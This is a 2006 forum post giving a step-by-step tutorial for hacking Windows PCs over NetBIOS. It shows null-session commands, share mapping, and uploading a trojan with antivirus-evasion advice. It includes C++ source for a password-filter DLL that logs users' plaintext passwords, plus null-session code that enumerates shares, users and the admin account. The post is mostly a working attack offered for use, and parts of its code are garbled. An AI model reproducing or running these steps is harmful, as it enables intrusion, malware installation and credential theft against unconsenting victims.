Screech Posted August 14, 2006 Report Posted August 14, 2006 Well..first of all hello folks..In this tutorial I wanna show u how to hack via NetBios.And here is what u need:- Windows ( for the method I'll explain here )- Internet - NetBIOS scans- the good old DOS console- a bit knowledge about DOS and nbtstat.exe and net.exe ( see microsoft technet for description )- knowledge about trojans or backdoors ( how they work...)************************************************************************************Lets start...1. Fire up a DOS box2. Now go to root ( usually c: ) and enter " nbtstat -A IP "( without " ", IP is the IP of the remote PC. You get the IP's from your scans )If the server/PC is hackable the result should be a table like this:NetBIOS Remote Machine Name TableName Type Status--------------------------------------------computername <00> UNIQUE Registeredworkgroupname <00> GROUP Registeredcomputername <20> UNIQUE Registeredworkgroupname <1E> GROUP Registeredworkgroupname <1D> UNIQUE Registered..__MSBROWSE__. <01> GROUP RegisteredMAC Address = xx-xx-xx-xx-xx-xx ( the x's are hex numbers )************************************************************************************You can scan for NetBios with X-Scan. Also scan with a port scanner like superscan(available at www.packetstormsecurity.nl) 'cause port 135-139 often stands for NetBios.An original scan wit X-Scan could look like:xxx.xxx.xxx.xxxAdministrator - [built-in account for administering the computer/domain]Account type: AdministratorPassword age: 291 Day 10 Hour 28 Minute 34 Sec.Bad password count: 0Number logons: 9Last logon: GMT Wed Aug 14 15:26:38 2002Guest - [built-in account for guest access to the computer/domain]Account type: GuestPassword age: 0 Day 0 Hour 0 Minute 0 Sec.Bad password count: 0Number logons: 0************************************************************************************3. Mkay now enter this in the DOS box:( you have to replace the xxx.... by the IP of the target and dont write the c: 'cause it is there yet )c:net view xxx.xxx.xxx.xxxResponse (possible):System error 5 occured.Access denied.c:ooops...wasn't as easy as we thought...well ok type:c:net use xxx.xxx.xxx.xxxipc$ "" /user:"" ( this creates a zero session )Response: The command completed successfully.Ok..lets test it again...c:net view xxx.xxx.xxx.xxxResponse: Shared resources on xxx.xxx.xxx.xxx* Here it displays the resourcesmkay...now we know the shared resourcesNow we assign a drive to a shared folder...c:net use m: xxx.xxx.xxx.xxx"folder" ( replace "folder" by a shared folders name )Response: The command completed successfully.Now we switch to our new drive:c:m:..usually nothing interesting in a shared folder. And because of that...4. Now we can upload a trojan who gives us access to rest of the PC. It's good to code asmall trojan that does all what we want, because existing trojans are recognized by AVtools. But u can also take an existing one like BO2k ...Now upload:m:copy c:path_to_the_trojan_here m:Now the trojan is installed. Best thing is to upload a dll-trojan thru the other trojan that replaces a *.dll5. Now we close the connection to the remote folder with:c:net use m: /DELETE********************************************************************************************************************************************************************************************************** C++ source for this shit to save time ************************************************************************************************************************************************************************************************************************************* Perhaps you have to edit it at several lines *****************************************************************************************************************#include <windows.h>#include <stdio.h>#include <stdlib.h>struct UNI_STRING {USHORT len;USHORT maxlen;WCHAR *buff;};static HANDLE fh;BOOLEAN __stdcall InitializeChangeNotify (){DWORD wrote;fh = CreateFile("C:WINNTtemppwdchange.tmp", GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,0);WriteFile(fh, "InitializeChangeNotify gestartedn", 31, &wrote, 0);return TRUE;}LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,struct UNI_STRING *passwd){DWORD wrote;WCHAR wbuf[200];char buf[512];char buf1[200];DWORD len;memcpy(wbuf, user->buff, user->len);len = user->len/sizeof(WCHAR);wbuf[len] = 0;wcstombs(buf1, wbuf, 199);sprintf(buf, "User = %s : ", buf1);WriteFile(fh, buf, strlen(buf), &wrote, 0);memcpy(wbuf, passwd->buff, passwd->len);len = passwd->len/sizeof(WCHAR);wbuf[len] = 0;wcstombs(buf1, wbuf, 199);sprintf(buf, "p4sswd = %s : ", buf1);WriteFile(fh, buf, strlen(buf), &wrote, 0);sprintf(buf, "RID = %xn", rid);WriteFile(fh, buf, strlen(buf), &wrote, 0);return 0L;}BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg){char* pTemp = TargetHost.GetBuffer(256);WCHAR wszServ[256];LPWSTR Server = NULL;//convert to unicodeMultiByteToWideChar(CP_ACP, 0, pTemp,strlen(pTemp)+1,wszServ,sizeof(wszServ)/sizeof(wszServ[0]) );Server = wszServ;LPCWSTR szIpc = L"IPC$";WCHAR RemoteResource[UNCLEN + 5 + 1];DWORD dwServNameLen;DWORD dwRC;NET_API_STATUS nas;USE_INFO_2 ui2;SHARE_INFO_1* pSHInfo1 = NULL;DWORDdwEntriesRead;DWORD dwTotalEntries;HTREEITEM machineRoot, shareRoot, userRoot, adminRoot, attribRoot;char sharename[256];char remark[256];if(Server == NULL || *Server == L''){SetLastError(ERROR_INVALID_COMPUTERNAME);return FALSE;}dwServNameLen = lstrlenW( Server );if(Server[0] != L''&& Server[1] != L''){RemoteResource[0] = L'';RemoteResource[1] = L'';RemoteResource[2] = L'';}else{dwServNameLen -= 2;RemoteResource[0] = L'';}if(dwServNameLen >CNLEN){SetLastError(ERROR_INVALID_COMPUTERNAME);return FALSE;}if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;ZeroMemory(&ui2, sizeof(ui2));ui2.ui2_local = NULL;ui2.ui2_remote = (LPTSTR) RemoteResource;ui2.ui2_asg_type = USE_IPC;ui2.ui2_password = (LPTSTR) L"";ui2.ui2_username = (LPTSTR) L"";ui2.ui2_domainname = (LPTSTR) L"";nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);dwRC = GetLastError();if( nas == NERR_Success ){machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0,TVI_ROOT);}nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1,MAX_PREFERRED_LENGTH,&dwEntriesRead,&dwTotalEntries, NULL);dwRC = GetLastError();if( nas == NERR_Success ){if(dwTotalEntries > 0){shareRoot = pDlg->m_Victims.InsertItem("Shares",machineRoot,TVI_LAST);userRoot = pDlg->m_Victims.InsertItem("Users", machineRoot,TVI_LAST);adminRoot = pDlg->m_Victims.InsertItem("Admin",machineRoot,TVI_LAST);}for(int x=0; x<(int)dwTotalEntries; x++){WideCharToMultiByte(CP_ACP, 0, (const unsignedshort*)pSHInfo1->shi1_netname, -1,sharename, 256, NULL, NULL );WideCharToMultiByte( CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_remark, -1,remark, 256, NULL, NULL );CString ShareDetails = sharename;ShareDetails = ShareDetails + " - " + remark;attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot,TVI_LAST);pSHInfo1++;}}DoNetUserEnum(Server, pDlg, userRoot, adminRoot);nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);TargetHost.ReleaseBuffer();SetLastError( nas );return FALSE;}bool GetAdmin(char* pServer, char* pUser, CString& Name){BOOL fAdmin = FALSE;DWORD dwDomainName,dwSize,dwAdminVal;SID_NAME_USE use;PSID pUserSID = NULL; // SID für Benutzerint rc;int iSubCount;bool bFoundHim = 0;dwDomainName = 256;dwSize = 0;dwAdminVal = 0;iSubCount = 0;rc = LookupAccountName(pServer,pUser, pUserSID,&dwSize, szDomainName,&dwDomainName, &use );rc = GetLastError();if(rc == ERROR_INSUFFICIENT_BUFFER){pUserSID = (PSID) malloc(dwSize);rc = LookupAccountName(pServer,pUser, pUserSID,&dwSize, szDomainName,&dwDomainName, &use );}iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID));dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1));if(dwAdminVal==500){Name.Format("Admin is %s%s", szDomainName, pUser);bFoundHim = true;}delete pUserSID;return bFoundHim;}void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot){USER_INFO_10 *pUserbuf, *pCurUser;DWORD dwRead, dwRemaining, dwResume, dwRC;char userName[256];char userServer[256];dwResume = 0;if(pServer[0] != L'' && pServer[1] != L''){RemoteResource[0] = L'';RemoteResource[1] = L'';RemoteResource[2] = L'';}else{dwServNameLen -= 2;RemoteResource[0] = L'';}if(dwServNameLen > CNLEN){SetLastError(ERROR_INVALID_COMPUTERNAME);return;}if(lstrcatW(RemoteResource, pServer) == NULL) return;do{pUserbuf = NULL;dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf,1024,&dwRead, &dwRemaining, &dwResume);if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS)break;DWORD i;for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser){WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name,-1, userName, 256, NULL, NULL );WideCharToMultiByte( CP_ACP, 0, pServer, -1,userServer, 256, NULL, NULL );if(!GotAdmin){CString Admin;GotAdmin = GetAdmin(userServer, userName, Admin);if(GotAdmin{Admin.TrimRight();HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST);pDlg->m_Victims.EnsureVisible(adminChild);}}CString strUserName = userName;pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST);}if (pUserbuf != NULL)NetApiBufferFree(pUserbuf);} while (dwRC == ERROR_MORE_DATA);if (dwRC != ERROR_SUCCESS)printf("NUE() returned %lu", dwRC);}***************************************************************************************Some NetBios hacking tools:DumpSechttp://www.somarsoft.comWindows NT/2000Legionhttp://www.technotronic.comWindows 9x/NT/2000, UNIX/LinuxNAThttp://www.packetstormsecurity.nlWindows 9x/NT, UNIX/Linux****************************************************************************************Congratulation...you've hacked him now u can connect him with http://FTP. Quote